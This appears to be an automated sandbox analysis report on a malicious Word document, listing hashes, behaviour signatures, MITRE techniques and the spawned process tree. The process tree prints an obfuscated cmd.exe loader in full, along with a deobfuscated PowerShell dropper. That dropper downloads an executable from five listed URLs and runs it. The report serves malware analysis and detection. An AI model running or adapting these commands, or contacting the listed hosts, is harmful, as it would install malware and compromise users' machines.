Analysis

  • max time kernel
    140s
  • max time network
    186s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 00:27

General

  • Target

    45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc

  • Size

    135KB

  • MD5

    5d306a8b1060e779dd27b30749c25d73

  • SHA1

    f48489348a2aa9b01ed7aa7c4ea17aa3002c194e

  • SHA256

    45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7

  • SHA512

    14945a24d04928ec7e89f49ed1afdd71b76b2ca9ebd8b8fb536c3345be06c6c14c32699e95516749a8650c22f274ad2b5b5f6935f729141d1a7784bca0165afb

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://www.srskgroup.com/9d74kPY
    http://www.stovefree.com/Zg
    http://www.rohanpurit.com/gfnpS
    http://www.misyaland.com/q
    http://teambored.co.uk/Ps

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3644
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-/mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,48,15,37,32,33,25,65,62,37,82,38,74,3,37,38,58,31,37,65,43,76,27,37,15,38,72,52,41,11,11,48,53,22,38,38,42,54,34,34,32,32,32,58,13,70,13,50,55,70,25,57,42,58,82,25,35,34,47,19,56,61,50,23,30,51,22,38,38,42,54,34,34,32,32,32,58,13,38,25,77,37,46,70,37,37,58,82,25,35,34,44,55,51,22,38,38,42,54,34,34,32,32,32,58,70,25,22,68,15,42,57,70,27,38,58,82,25,35,34,55,46,15,42,66,51,22,38,38,42,54,34,34,32,32,32,58,35,27,13,39,68,76,68,15,19,58,82,25,35,34,11,51,22,38,38,42,54,34,34,38,37,68,35,65,25,70,37,19,58,82,25,58,57,50,34,23,13,53,58,66,42,76,27,38,40,53,51,53,80,72,52,38,24,67,48,53,23,15,57,53,72,52,64,4,25,74,48,74,53,59,47,61,53,72,52,82,4,36,48,53,43,15,76,53,72,52,27,64,11,48,52,37,15,77,54,38,37,35,42,69,53,79,53,69,52,64,4,25,69,53,58,37,60,37,53,72,46,25,70,37,68,82,22,40,52,15,43,62,74,27,15,74,52,41,11,11,80,45,38,70,39,45,52,3,20,64,58,26,25,32,15,76,25,68,19,81,27,76,37,40,52,15,43,62,75,74,52,27,64,11,80,72,52,26,13,50,48,53,25,15,27,53,72,0,46,74,40,40,10,37,38,33,0,38,37,35,74,52,27,64,11,80,58,76,37,15,55,38,22,74,33,55,37,74,73,78,78,78,78,80,74,45,0,15,77,25,50,37,33,0,38,37,35,74,52,27,64,11,72,52,76,63,15,48,53,32,36,43,53,72,65,70,37,68,50,72,71,71,82,68,38,82,22,45,71,71,52,43,13,82,48,53,20,27,11,53,72,86)do set C6R=!C6R!!bl:~%j,1!&&if %j gtr 85 %TEMP:~-1,1%owershell "!C6R:~-432!""
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\system32\cmd.exe
        CmD /V:O/C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-/mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,48,15,37,32,33,25,65,62,37,82,38,74,3,37,38,58,31,37,65,43,76,27,37,15,38,72,52,41,11,11,48,53,22,38,38,42,54,34,34,32,32,32,58,13,70,13,50,55,70,25,57,42,58,82,25,35,34,47,19,56,61,50,23,30,51,22,38,38,42,54,34,34,32,32,32,58,13,38,25,77,37,46,70,37,37,58,82,25,35,34,44,55,51,22,38,38,42,54,34,34,32,32,32,58,70,25,22,68,15,42,57,70,27,38,58,82,25,35,34,55,46,15,42,66,51,22,38,38,42,54,34,34,32,32,32,58,35,27,13,39,68,76,68,15,19,58,82,25,35,34,11,51,22,38,38,42,54,34,34,38,37,68,35,65,25,70,37,19,58,82,25,58,57,50,34,23,13,53,58,66,42,76,27,38,40,53,51,53,80,72,52,38,24,67,48,53,23,15,57,53,72,52,64,4,25,74,48,74,53,59,47,61,53,72,52,82,4,36,48,53,43,15,76,53,72,52,27,64,11,48,52,37,15,77,54,38,37,35,42,69,53,79,53,69,52,64,4,25,69,53,58,37,60,37,53,72,46,25,70,37,68,82,22,40,52,15,43,62,74,27,15,74,52,41,11,11,80,45,38,70,39,45,52,3,20,64,58,26,25,32,15,76,25,68,19,81,27,76,37,40,52,15,43,62,75,74,52,27,64,11,80,72,52,26,13,50,48,53,25,15,27,53,72,0,46,74,40,40,10,37,38,33,0,38,37,35,74,52,27,64,11,80,58,76,37,15,55,38,22,74,33,55,37,74,73,78,78,78,78,80,74,45,0,15,77,25,50,37,33,0,38,37,35,74,52,27,64,11,72,52,76,63,15,48,53,32,36,43,53,72,65,70,37,68,50,72,71,71,82,68,38,82,22,45,71,71,52,43,13,82,48,53,20,27,11,53,72,86)do set C6R=!C6R!!bl:~%j,1!&&if %j gtr 85 powershell "!C6R:~-432!""
        3⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell "$JZk='WNF';$NMX=new-object Net.WebClient;$Qqq='http://www.srskgroup.com/9d74kPY@http://www.stovefree.com/Zg@http://www.rohanpurit.com/gfnpS@http://www.misyaland.com/q@http://teambored.co.uk/Ps'.Split('@');$tLz='Pnu';$XKo = '694';$cKT='Cnl';$iXq=$env:temp+'\'+$XKo+'.exe';foreach($nCj in $Qqq){try{$NMX.DownloadFile($nCj, $iXq);$Dsk='oni';If ((Get-Item $iXq).length -ge 80000) {Invoke-Item $iXq;$lVn='wTC';break;}}catch{}}$Csc='Miq';"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4324

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • Query Registry (T1012): 2
    • System Information Discovery (T1082): 2

Downloads

  • memory/1772-137-0x0000000000000000-mapping.dmp
  • memory/2792-138-0x0000000000000000-mapping.dmp
  • memory/3644-133-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-143-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-130-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-135-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmp (Filesize 64KB)
  • memory/3644-136-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmp (Filesize 64KB)
  • memory/3644-131-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-132-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-146-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-145-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-144-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/3644-134-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmp (Filesize 64KB)
  • memory/4324-141-0x00007FFAA7BA0000-0x00007FFAA8661000-memory.dmp (Filesize 10.8MB)
  • memory/4324-140-0x000001A3FC460000-0x000001A3FC482000-memory.dmp (Filesize 136KB)
  • memory/4324-139-0x0000000000000000-mapping.dmp